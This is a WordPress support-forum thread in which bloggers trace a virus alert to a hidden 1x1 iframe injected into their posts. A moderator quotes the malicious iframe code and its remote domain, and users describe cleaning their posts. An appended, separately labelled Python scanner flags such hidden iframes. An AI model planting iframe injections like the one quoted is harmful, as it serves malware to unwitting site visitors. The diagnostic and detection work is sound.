WordPress.org

wp-stats[1].htm Downloader Virus – Upgrade to 2.3.2

  • Ok, I’ve not been able to find much on the Internet about this issue.

    I upgraded my site to 2.3.2 and when viewing the site I get an alert about a virus.

    The virus is the Downloader virus and is supposedly in wp-stats[1].htm

    Anyone else have an idea about this scenario?

    Also, I’ve scanned all my files and there were no viruses found.

Viewing 15 replies - 1 through 15 (of 20 total)
  • Samuel Wood (Otto)
    WordPress.org Tech Dude

    @otto42

    What is the site? There is no “wp-stats[1].htm” as part of WordPress.

    The site:

    http://blogs.somelifeissues.com/

    I did a Google search for wp-stats[1].htm and came up with others who are encountering the same thing.

    Samuel Wood (Otto)
    WordPress.org Tech Dude

    @otto42

    Some code has been inserted into your post on November 16th:

    <p>I will return to writing<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --> after the New Year. Enjoy the holidays!!!</p>

    That wp-stats-php.info site is where it comes from. Edit that post and remove that code.

    Likely your site got hacked before you upgraded.

    Never mind. Found it. Somehow the following string got injected into one of my blogs ..gggggrrrrr

    <!-- Traffic Statistics --> <iframe height="1" width="1" frameBorder="0" src="http://www.wp-stats-XXXphp.info/iframe/wp-stats.XXXphp"></iframe><!-- End Traffic Statistics -->

    The XXX is to prevent it from happening here.

    Thanks Otto. I see we found it at the same time.

    Appreciate the extra hand.

    Thanks for this post. It had infected one of my blogs as well. It was easy to view the source of my main blog page, find the two posts that had been affected, delete the code from the posts, and it was done. Does 2.3.2 prevent this from happening again?

    Duh – I just looked at the title of this thread! I will upgrade tonight!

    pcbenny1234
    Member

    @pcbenny1234

    Hello guys, I have the same problem and I cannot solve it, help! Please. My site is: http://www.margheritaorta.it

    I also got it. Same <!-- Traffic Statistics --> code was inserted in one of my posts.

    I also visited home website of a top 10 themes and when I got to red secret 01 and visited the creator’s home page it attempted to run a downloader.exe, my Norton detected it as a virus.

    Thanks for posting.

    delete or rename your xmlrpc.php

    jason-morrison
    Member

    @jason-morrison

    I ran into this too, this can get your site a nasty warning in Google and Firefox. Here’s a post about cleaning it up.

    how do you search the source of your posts? do i have to do this in the wp posts edit window? i hope not as i have 4 years worth of posts. if not, where can i find the actual post files for my blog so that i can batch search them locally?

    please, please help. and thank you so much!
    merideth
    http://house-made.com

    nevermind…i think i solved it.
    🙂

    As an FYI I had this hack happen to one of my blogs last evening (03/30/08). I would note that I had upgraded to WP 2.3.3 about two weeks ago and it wasn’t hacked as of yesterday afternoon. From this it would appear that WP 2.3.3 is vulnerable to this exploit.

    Cheers!
    Mike S.

    ok i’m still having this problem. I did a search and didn’t turn up anything with “traffic statistics” in it. I deleted the fake wp-stats file and my wordpress is updated. Any advice? Help?

    thanks so much!

    merideth
    http://house-made.com
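
Added example, not part of the original thread: one way to batch-check post content for the kind of injection quoted above, keyed on how the iframe is hidden (1x1 size or hiding styles) rather than on the "Traffic Statistics" comment text, which a search can miss. It assumes the posts have been exported as (ID, post_content) pairs; the sample rows and host names are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

class HiddenIframeFinder(HTMLParser):
    """Collects iframes that are sized or styled so a visitor cannot see them."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        reasons = []
        for dim in ("width", "height"):
            # Accept "1", "1px" and unquoted values such as width=1.
            m = re.match(r"\s*(\d+)", a.get(dim, ""))
            if m and int(m.group(1)) <= 1:
                reasons.append(f"{dim}={m.group(1)}")
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by style")
        if reasons:
            self.hits.append((urlparse(a.get("src", "")).hostname, reasons))

def scan_posts(posts):
    """posts: iterable of (post_id, post_content). Returns [(post_id, host, reasons)]."""
    findings = []
    for post_id, content in posts:
        finder = HiddenIframeFinder()
        finder.feed(content)
        finder.close()
        findings += [(post_id, host, why) for host, why in finder.hits]
    return findings

# Constructed sample rows standing in for (ID, post_content) from the posts table.
SAMPLE_POSTS = [
    (101, "<p>I will return to writing<!-- Traffic Statistics --> "
          "<iframe src=http://stats.example.invalid/iframe/s.php width=1 height=1 "
          "frameborder=0></iframe> <!-- End Traffic Statistics --> soon.</p>"),
    (102, '<p>Talk video:</p><iframe src="https://video.example.org/embed/1" '
          'width="560" height="315"></iframe>'),
    (103, '<p>No marker comment here</p><iframe style="display: none" '
          'src="//cdn.example.invalid/x"></iframe>'),
]

if __name__ == "__main__":
    for post_id, host, why in scan_posts(SAMPLE_POSTS):
        print(f"post {post_id}: hidden iframe -> {host} ({', '.join(why)})")
```

Post 102 is a normal visible embed and is not reported; post 103 is reported even though it carries no marker comment.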

  • The topic ‘wp-stats[1].htm Downloader Virus – Upgrade to 2.3.2’ is closed to new replies.